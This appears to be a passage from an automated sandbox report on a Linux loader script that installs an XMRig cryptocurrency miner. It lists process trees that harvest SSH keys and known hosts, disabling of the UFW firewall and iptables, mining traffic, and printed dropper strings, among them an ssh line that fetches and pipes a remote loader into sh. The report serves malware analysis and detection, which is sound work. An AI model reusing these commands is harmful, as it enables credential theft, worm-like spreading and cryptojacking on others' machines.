      • grep (PID: 4233, Parent: 4230, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -E (ssh|scp)
      • sh New Fork (PID: 4234, Parent: 4230)
      • grep (PID: 4234, Parent: 4230, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -oP ([0-9]{1,3}\\.){3}[0-9]{1,3}
    • sh New Fork (PID: 4240, Parent: 2676)
      • sh New Fork (PID: 4245, Parent: 4240)
      • cat (PID: 4245, Parent: 4240, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /home/user/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts
      • sh New Fork (PID: 4246, Parent: 4240)
      • grep (PID: 4246, Parent: 4240, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -oP ([0-9]{1,3}\\.){3}[0-9]{1,3}
      • sh New Fork (PID: 4247, Parent: 4240)
      • uniq (PID: 4247, Parent: 4240, MD5: 7281c3baf4062776958ba17bb9086d23) Arguments: uniq
    • sh New Fork (PID: 4258, Parent: 2676)
      • sh New Fork (PID: 4262, Parent: 4258)
      • find (PID: 4262, Parent: 4258, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /home/user/ /root /home -maxdepth 2 -name \\.ssh
      • sh New Fork (PID: 4263, Parent: 4258)
      • uniq (PID: 4263, Parent: 4258, MD5: 7281c3baf4062776958ba17bb9086d23) Arguments: uniq
      • sh New Fork (PID: 4264, Parent: 4258)
      • xargs (PID: 4264, Parent: 4258, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs find
        • xargs New Fork (PID: 4271, Parent: 4264)
        • find (PID: 4271, Parent: 4264, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find
      • sh New Fork (PID: 4265, Parent: 4258)
      • awk (PID: 4265, Parent: 4258, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk /id_rsa/
      • sh New Fork (PID: 4266, Parent: 4258)
      • awk (PID: 4266, Parent: 4258, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk -F/ "{print $3}"
      • sh New Fork (PID: 4267, Parent: 4258)
      • uniq (PID: 4267, Parent: 4258, MD5: 7281c3baf4062776958ba17bb9086d23) Arguments: uniq
      • sh New Fork (PID: 4268, Parent: 4258)
      • grep (PID: 4268, Parent: 4258, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v \\.ssh
    • sh New Fork (PID: 4283, Parent: 2676)
      • sh New Fork (PID: 4286, Parent: 4283)
      • sh New Fork (PID: 4287, Parent: 4283)
      • tr (PID: 4287, Parent: 4283, MD5: c3b8966209cabdf2aea6b52dba40f87d) Arguments: tr " " \\n
      • sh New Fork (PID: 4288, Parent: 4283)
      • nl (PID: 4288, Parent: 4283, MD5: d9f1aeacda6ab67392e095da38197886) Arguments: nl
      • sh New Fork (PID: 4289, Parent: 4283)
      • sort (PID: 4289, Parent: 4283, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u -k2
      • sh New Fork (PID: 4290, Parent: 4283)
      • sort (PID: 4290, Parent: 4283, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -n
      • sh New Fork (PID: 4291, Parent: 4283)
      • cut (PID: 4291, Parent: 4283, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -f2-
    • sh New Fork (PID: 4299, Parent: 2676)
      • sh New Fork (PID: 4304, Parent: 4299)
      • sh New Fork (PID: 4305, Parent: 4299)
      • grep (PID: 4305, Parent: 4299, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -vw 127.0.0.1
      • sh New Fork (PID: 4306, Parent: 4299)
      • tr (PID: 4306, Parent: 4299, MD5: c3b8966209cabdf2aea6b52dba40f87d) Arguments: tr " " \\n
      • sh New Fork (PID: 4307, Parent: 4299)
      • nl (PID: 4307, Parent: 4299, MD5: d9f1aeacda6ab67392e095da38197886) Arguments: nl
      • sh New Fork (PID: 4308, Parent: 4299)
      • sort (PID: 4308, Parent: 4299, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u -k2
      • sh New Fork (PID: 4309, Parent: 4299)
      • sort (PID: 4309, Parent: 4299, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -n
      • sh New Fork (PID: 4310, Parent: 4299)
      • cut (PID: 4310, Parent: 4299, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -f2-
    • sh New Fork (PID: 4319, Parent: 2676)
      • sh New Fork (PID: 4325, Parent: 4319)
      • sh New Fork (PID: 4326, Parent: 4319)
      • tr (PID: 4326, Parent: 4319, MD5: c3b8966209cabdf2aea6b52dba40f87d) Arguments: tr " " \\n
      • sh New Fork (PID: 4327, Parent: 4319)
      • nl (PID: 4327, Parent: 4319, MD5: d9f1aeacda6ab67392e095da38197886) Arguments: nl
      • sh New Fork (PID: 4328, Parent: 4319)
      • sort (PID: 4328, Parent: 4319, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u -k2
      • sh New Fork (PID: 4329, Parent: 4319)
      • sort (PID: 4329, Parent: 4319, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -n
      • sh New Fork (PID: 4330, Parent: 4319)
      • cut (PID: 4330, Parent: 4319, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -f2-
    • sh New Fork (PID: 4336, Parent: 2676)
    • cat (PID: 4336, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
    • sh New Fork (PID: 4344, Parent: 2676)
    • cat (PID: 4344, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
    • sh New Fork (PID: 4351, Parent: 2676)
    • cat (PID: 4351, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
    • sh New Fork (PID: 4357, Parent: 2676)
    • cat (PID: 4357, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
  • cleanup

Yara Overview

Initial Sample

Source: 28e9b_ldr.sh | Rule: SUSP_LNX_Linux_Malware_Indicators_Aug20_1 | Description: Detects indicators often found in linux malware samples | Author: Florian Roth | Strings:
  • 0x2e8:$s1: && chmod +x
  • 0x2a3:$s3: /tmp
  • 0x94c:$s3: /tmp
  • 0x953:$s3: /tmp
  • 0x119:$s4: |curl
Source: 28e9b_ldr.sh | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security

Dropped Files

Source: /bin/ytdgwk | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: /bin/ytdgwk | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: /bin/ytdgwk | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security

Jbx Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: /tmp/8267b26db341 | Avira: detection malicious, Label: LINUX/CoinMiner.lsfus

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match | File source: 28e9b_ldr.sh, type: SAMPLE
Source: Yara match | File source: /bin/ytdgwk, type: DROPPED
Source: Yara match | File source: /bin/ytdgwk, type: DROPPED
Source: Yara match | File source: /bin/ytdgwk, type: DROPPED
Detected Stratum mining protocol
Source: global traffic | TCP traffic: 192.168.1.100:58330 -> 194.145.227.21:5443 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"xmrig/6.4.0 (linux x86_64) libuv/1.38.1 gcc/9.3.0","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}
Found strings related to Crypto-Mining
Source: ytdgwk.449.dr | String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: ytdgwk.449.dr | String found in binary or memory: cryptonight/0
Source: ytdgwk.449.dr | String found in binary or memory: -o, --url=URL URL of mining server
Source: ytdgwk.449.dr | String found in binary or memory: stratum+tcp://
Source: ytdgwk.449.dr | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: ytdgwk.449.dr | String found in binary or memory: XMRig 6.4.0
Tries to load the MSR kernel module used for reading/writing to CPUs model specific register
Source: /bin/sh (PID: 4515) | Modprobe: /sbin/modprobe -> /sbin/modprobe msr
Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)
Source: kthreaddk (PID: 4501) | MSR open for writing: /dev/cpu/0/msr
Source: kthreaddk (PID: 4499) | Reads CPU info from proc file: /proc/cpuinfo
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/thread_siblings
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_siblings
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
Source: kthreaddk (PID: 4499) | Reads CPU info from /sys: /sys/devices/system/cpu/possible

Spreading:

Found strings indicative of a multi-platform dropper
Source: 28e9b_ldr.sh | String: curl -k $1>$2||wget --no-check-certificate -q -O- $1>$2||curl $1>$2||wget -q -O- $1>$2
Source: 28e9b_ldr.sh | String: ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl $cc/ldr.sh?localssh||wget -q -O- $cc/ldr.sh?localssh)|sh"

Networking:

Deletes all firewall rules
Source: /lib/ufw/ufw-init (PIDs 2766-2968) - Args: iptables -F <chain>, one process per chain for all 32 ufw-* chains: ufw-logging-deny (2766), ufw-logging-allow (2792), ufw-not-local (2793), ufw-user-logging-input (2797), ufw-user-limit-accept (2802), ufw-user-limit (2807), ufw-skip-to-policy-input (2810), ufw-reject-input (2815), ufw-after-logging-input (2819), ufw-after-input (2823), ufw-user-input (2830), ufw-before-input (2835), ufw-before-logging-input (2841), ufw-skip-to-policy-forward (2849), ufw-reject-forward (2858), ufw-after-logging-forward (2863), ufw-after-forward (2869), ufw-user-logging-forward (2874), ufw-user-forward (2881), ufw-before-forward (2887), ufw-before-logging-forward (2897), ufw-track-forward (2902), ufw-track-output (2910), ufw-track-input (2913), ufw-skip-to-policy-output (2921), ufw-reject-output (2929), ufw-after-logging-output (2935), ufw-after-output (2944), ufw-user-logging-output (2951), ufw-user-output (2957), ufw-before-output (2963), ufw-before-logging-output (2968)
Source: /bin/sh (PID: 3748) - Args: iptables -F
Disables Ubuntu's Uncomplicated Firewall (UFW)
Source: /bin/sh (PID: 2685) - UFW: /usr/sbin/ufw -> /usr/bin/python3 /usr/sbin/ufw disable
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /lib/ufw/ufw-init (PIDs 2766-2968) - Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F <chain>, the same 32 ufw-* chain flushes listed under "Deletes all firewall rules"
Source: /lib/ufw/ufw-init (PIDs 3171-3249) - Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X <chain>: ufw-logging-deny (3171), ufw-logging-allow (3176), ufw-not-local (3182), ufw-user-logging-input (3188), ufw-user-logging-output (3195), ufw-user-logging-forward (3200), ufw-user-limit-accept (3208), ufw-user-limit (3213), ufw-user-input (3219), ufw-user-forward (3224), ufw-user-output (3230), ufw-skip-to-policy-input (3236), ufw-skip-to-policy-output (3244), ufw-skip-to-policy-forward (3249)
Source: /lib/ufw/ufw-init (PIDs 3254, 3261, 3266) - Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P INPUT ACCEPT, iptables -P OUTPUT ACCEPT, iptables -P FORWARD ACCEPT
Source: /bin/sh (PIDs 3733, 3740, 3744) - Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P INPUT ACCEPT, iptables -P OUTPUT ACCEPT, iptables -P FORWARD ACCEPT
Only two of these groups are commands the loader issued itself: the single ufw disable (PID 2685) and the direct iptables calls from /bin/sh (PIDs 3733, 3740, 3744, 3748). Everything run by /lib/ufw/ufw-init is UFW's own teardown, executed on behalf of that ufw disable: it flushes and deletes its chains and resets the built-in chains to ACCEPT. The direct calls repeat the result so that a host without UFW ends up in the same state, with all three default chains at ACCEPT and no rules. On a suspect host, iptables -S showing -P INPUT ACCEPT with no rules and ufw status reporting inactive is the footprint to look for.
Uses known network protocols on non-standard ports
Source: unknown - Network traffic detected: HTTP traffic to TCP port 7001 from 80 distinct ephemeral source ports on the analysis host: 32822, 33306, 33364, 34224, 34282, 34378, 34788, 34886, 35406, 35942, 36018, 36038, 36118, 36316, 36368, 36732, 36796, 36806, 38556, 39748, 39802, 39846, 40242, 40440, 40632, 40812, 41038, 41284, 41346, 41506, 41582, 42792, 43326, 43504, 43874, 44834, 46494, 46802, 46872, 47294, 47466, 47594, 47770, 48834, 49354, 49580, 49630, 50088, 50484, 50552, 50928, 50956, 51182, 51356, 51568, 52178, 52454, 52984, 53954, 53966, 54404, 54420, 54554, 54602, 54980, 54994, 55734, 55918, 56534, 56904, 57552, 57604, 57794, 57914, 57960, 58272, 58540, 59066, 59510, 60380
Source: unknown - Network traffic detected: HTTP traffic from port 7001 back to ephemeral ports 54420, 54994, 47594, 41346, 40242, 47466
All of these flows originate from ephemeral ports on the analysis host and go to TCP 7001 on a remote system; the six 7001 -> N entries are the server side of the same connections. They are outbound HTTP fetches by the sample, not a listener it opened. The signature fires because HTTP is carried on a port other than the usual HTTP ports; it does not identify the service listening on 7001, and this section does not name the remote host.
          Source: unknownNetwork traffic detected: HTTP traffic on port 54554 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41832 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50484 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33306 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55734 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 60380 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 32822 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41832 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34886 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46872 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54554 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58272 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50484 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35942 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34788 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34956 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34224 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41832 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36806 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 60380 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39004 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51182 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39846 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39004 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53954 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 38556 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39802 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54980 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46872 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39004 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35406 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34378 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55918 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41284 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33364 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49354 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 60380 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59066 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59510 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53966 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33306 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55734 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 32822 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34886 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46872 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58272 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39846 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35942 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34788 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34224 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 38556 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36806 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39802 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54980 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51182 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53954 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 60380 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 44270 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51562 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 7001 -> 44270
          Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 7001 -> 51562
          Source: unknownNetwork traffic detected: HTTP traffic on port 45530 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35406 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39892 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46264 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51778 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47976 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34208 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52570 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57910 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51654 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34374 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 56182 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35756 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36558 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43296 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 45530 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 42792 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53518 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46264 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51778 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 32808 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34378 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46080 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58764 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43466 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47976 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52702 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52570 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51654 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57910 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34374 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 7001 -> 43466
          Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 60594 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 45530 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43296 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 56182 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35756 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55918 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58764 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 32808 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52570 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52702 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57910 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51654 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34374 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46264 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51778 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 60594 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47976 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58764 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 45530 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43296 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41284 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46872 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52702 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 60594 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 32808 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 56182 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35756 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52570 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57910 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51654 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33364 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34374 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46264 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49354 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58764 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51778 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 44020 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41256 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54926 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43296 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 45530 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 56646 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33946 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47442 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59524 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 7001 -> 33946
          Source: unknownNetwork traffic detected: HTTP traffic on port 41256 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 60594 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43672 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52702 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 7001
